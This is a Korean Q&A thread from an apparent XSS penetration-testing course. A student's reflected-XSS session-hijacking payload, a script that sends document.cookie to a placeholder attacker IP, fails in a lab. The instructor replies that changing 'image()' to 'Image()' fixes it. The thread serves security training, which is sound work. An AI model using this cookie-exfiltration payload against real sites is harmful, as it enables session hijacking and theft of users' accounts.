• 카테고리

    질문 & 답변

  • 세부 분야

    보안

  • 해결 여부

    미해결

[실습6-3] REFLECTED XSS를 통한 세션 하이재킹 공격 실습 공격 실패

22.10.16 20:46 작성 조회수 269

1

<script>new image().src='http://제아이피/xss_attack/session.php?data='+document.cookie</script>

location.href 스크립트는 성공했는데

했는데 new image().src는 세션값이 안넘어 옵니다...

혹시 자바1.8.0버전과 관련있을까요??

course-thumbnail

모의해킹 실무자가 알려주는, XSS 공격 기법

[실습6-2] STORED XSS를 통한 세션 하이재킹 공격 실습

강의실 바로가기

답변 2

·

답변을 작성해보세요.

0

몽상가님의 프로필

몽상가

2022.11.06

앗.. 저도 이거 해결못해서 3일이나 보다가 찾았.. 습니다.

 

0

크리핵티브님의 프로필

크리핵티브

지식공유자

2022.10.20

안녕하세요.

자바스크립트는 자바와 무관합니다.ㅎ

image() 에서 i를 대문자 I로 변경해서 해보세요.

이 글과 비슷한 Q&A